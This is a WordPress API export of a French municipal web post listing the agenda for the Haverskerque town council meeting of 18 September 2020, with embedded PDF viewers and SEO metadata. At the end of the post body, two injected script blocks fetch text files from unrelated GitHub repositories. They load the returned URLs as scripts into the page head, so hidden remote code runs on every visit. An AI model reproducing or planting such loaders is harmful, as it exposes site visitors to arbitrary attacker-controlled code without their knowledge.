{"id":696,"date":"2020-09-19T17:42:00","date_gmt":"2020-09-19T15:42:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=696"},"modified":"2024-07-29T06:39:17","modified_gmt":"2024-07-29T04:39:17","slug":"conseil-municipal-du-18-septembre-2020","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/","title":{"rendered":"Conseil Municipal du 18 Septembre 2020"},"content":{"rendered":"\n<p>ORDRE DU JOUR&nbsp;:<\/p>\n\n\n\n<p>1. Approbation des proc\u00e8s-verbaux des s\u00e9ances du 3 juillet 2020 et du 9 juillet 2020\u00a0;<br>2. Conseil municipal. \u00c9laboration d\u2019un r\u00e8glement int\u00e9rieur.<br>3. Finances. Subventions aux associations et aux personnes de droit priv\u00e9.<br>&#8211; Philibert Circus<br>&#8211; Miss Internationale<br>4. Communaut\u00e9 de communes Flandre Lys. Projet de convention de transfert de comp\u00e9tence pour l\u2019espace m\u00e9dical.<br>5. Communaut\u00e9 de communes Flandres Lys. Rectification de la D\u00e9lib\u00e9ration du 17 septembre 2019 sollicitant le fonds de concours 2019\/75 pour la cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918.<br>6. Communaut\u00e9 de communes Flandres Lys. Sollicitation de r\u00e9affectation du fonds de concours octroy\u00e9 pour la cr\u00e9ation de trottoirs rue du Moulin pour la r\u00e9fection de la place Albertine P\u00e9rel.<br>7. Salles de f\u00eates Victor Dehaine et Ren\u00e9 Cassin. Modification du r\u00e8glement.<br>8. P\u00e9riscolaire. R\u00e8glement int\u00e9rieur ann\u00e9e scolaire 2020-2021<br>9. Activit\u00e9s extrascolaires, ateliers Danse.<br>&#8211; Nomination d\u2019un coordonnateur<br>&#8211; R\u00e9mun\u00e9ration des intervenants<br>10. Personnel communal. Mise \u00e0 jour du tableau des effectifs.<br>11. Personnel communal. Ouverture de postes pour accroissement d\u2019activit\u00e9s.<br>12. Questions diverses.<br>13. Informations du Maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2422\"  _slug=\"ordre-du-jour-de-la-seance-du-18-septembre-2020\" data-title=\"ordre-du-jour-de-la-seance-du-18-septembre-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 18 Septembre 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2422 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_18092020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2419\"  _slug=\"compte-rendu-du-conseil-municipal-du-18-septembre-2020-a-19h30\" data-title=\"compte-rendu-du-conseil-municipal-du-18-septembre-2020-a-19h30\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte-rendu du Conseil Municipal du 18 Septembre 2020 \u00e0 19h30<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2419 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/compte_rendu_du_conseil_municipal_du_18_septembre_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR&nbsp;: 1. Approbation des proc\u00e8s-verbaux des s\u00e9ances du 3 juillet 2020 et du 9 juillet 2020\u00a0;2. Conseil municipal. \u00c9laboration d\u2019un r\u00e8glement int\u00e9rieur.3. Finances. Subventions aux associations et aux personnes de droit priv\u00e9.&#8211; Philibert Circus&#8211; Miss Internationale4. Communaut\u00e9 de communes Flandre Lys. Projet de convention de transfert de comp\u00e9tence pour l\u2019espace m\u00e9dical.5. Communaut\u00e9 de communes Flandres Lys. Rectification de la D\u00e9lib\u00e9ration du 17 septembre 2019 sollicitant le fonds de concours 2019\/75 pour la cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918.6. Communaut\u00e9 de communes Flandres Lys. Sollicitation de r\u00e9affectation du fonds de concours octroy\u00e9 pour la cr\u00e9ation de trottoirs rue du Moulin pour la r\u00e9fection de la place Albertine P\u00e9rel.7. Salles de f\u00eates Victor Dehaine et Ren\u00e9 Cassin. Modification du r\u00e8glement.8. P\u00e9riscolaire. R\u00e8glement int\u00e9rieur ann\u00e9e scolaire 2020-20219. Activit\u00e9s extrascolaires, ateliers Danse.&#8211; Nomination d\u2019un coordonnateur&#8211; R\u00e9mun\u00e9ration des intervenants10. Personnel communal. Mise \u00e0 jour du tableau des effectifs.11. Personnel communal. Ouverture de postes pour accroissement d\u2019activit\u00e9s.12. Questions diverses.13. Informations du Maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-696","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR&nbsp;: 1. Approbation des proc\u00e8s-verbaux des s\u00e9ances du 3 juillet 2020 et du 9 juillet 2020\u00a0;2. Conseil municipal. \u00c9laboration d\u2019un r\u00e8glement int\u00e9rieur.3. Finances. Subventions aux associations et aux personnes de droit priv\u00e9.&#8211; Philibert Circus&#8211; Miss Internationale4. Communaut\u00e9 de communes Flandre Lys. Projet de convention de transfert de comp\u00e9tence pour l\u2019espace m\u00e9dical.5. Communaut\u00e9 de communes Flandres Lys. Rectification de la D\u00e9lib\u00e9ration du 17 septembre 2019 sollicitant le fonds de concours 2019\/75 pour la cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918.6. Communaut\u00e9 de communes Flandres Lys. Sollicitation de r\u00e9affectation du fonds de concours octroy\u00e9 pour la cr\u00e9ation de trottoirs rue du Moulin pour la r\u00e9fection de la place Albertine P\u00e9rel.7. Salles de f\u00eates Victor Dehaine et Ren\u00e9 Cassin. Modification du r\u00e8glement.8. P\u00e9riscolaire. R\u00e8glement int\u00e9rieur ann\u00e9e scolaire 2020-20219. Activit\u00e9s extrascolaires, ateliers Danse.&#8211; Nomination d\u2019un coordonnateur&#8211; R\u00e9mun\u00e9ration des intervenants10. Personnel communal. Mise \u00e0 jour du tableau des effectifs.11. Personnel communal. Ouverture de postes pour accroissement d\u2019activit\u00e9s.12. Questions diverses.13. Informations du Maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-19T15:42:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:17+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 18 Septembre 2020\",\"datePublished\":\"2020-09-19T15:42:00+00:00\",\"dateModified\":\"2024-07-29T04:39:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/\"},\"wordCount\":207,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/\",\"name\":\"Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2020-09-19T15:42:00+00:00\",\"dateModified\":\"2024-07-29T04:39:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/09\\\/19\\\/conseil-municipal-du-18-septembre-2020\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 18 Septembre 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR&nbsp;: 1. Approbation des proc\u00e8s-verbaux des s\u00e9ances du 3 juillet 2020 et du 9 juillet 2020\u00a0;2. Conseil municipal. \u00c9laboration d\u2019un r\u00e8glement int\u00e9rieur.3. Finances. Subventions aux associations et aux personnes de droit priv\u00e9.&#8211; Philibert Circus&#8211; Miss Internationale4. Communaut\u00e9 de communes Flandre Lys. Projet de convention de transfert de comp\u00e9tence pour l\u2019espace m\u00e9dical.5. Communaut\u00e9 de communes Flandres Lys. Rectification de la D\u00e9lib\u00e9ration du 17 septembre 2019 sollicitant le fonds de concours 2019\/75 pour la cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918.6. Communaut\u00e9 de communes Flandres Lys. Sollicitation de r\u00e9affectation du fonds de concours octroy\u00e9 pour la cr\u00e9ation de trottoirs rue du Moulin pour la r\u00e9fection de la place Albertine P\u00e9rel.7. Salles de f\u00eates Victor Dehaine et Ren\u00e9 Cassin. Modification du r\u00e8glement.8. P\u00e9riscolaire. R\u00e8glement int\u00e9rieur ann\u00e9e scolaire 2020-20219. Activit\u00e9s extrascolaires, ateliers Danse.&#8211; Nomination d\u2019un coordonnateur&#8211; R\u00e9mun\u00e9ration des intervenants10. Personnel communal. Mise \u00e0 jour du tableau des effectifs.11. Personnel communal. Ouverture de postes pour accroissement d\u2019activit\u00e9s.12. Questions diverses.13. Informations du Maire au titre de ses d\u00e9l\u00e9gations et diverses informations communales et intercommunales.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2020-09-19T15:42:00+00:00","article_modified_time":"2024-07-29T04:39:17+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 18 Septembre 2020","datePublished":"2020-09-19T15:42:00+00:00","dateModified":"2024-07-29T04:39:17+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/"},"wordCount":207,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/","name":"Conseil Municipal du 18 Septembre 2020 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2020-09-19T15:42:00+00:00","dateModified":"2024-07-29T04:39:17+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/09\/19\/conseil-municipal-du-18-septembre-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 18 Septembre 2020"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/696","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=696"}],"version-history":[{"count":4,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/696\/revisions"}],"predecessor-version":[{"id":8312,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/696\/revisions\/8312"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=696"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=696"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=696"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}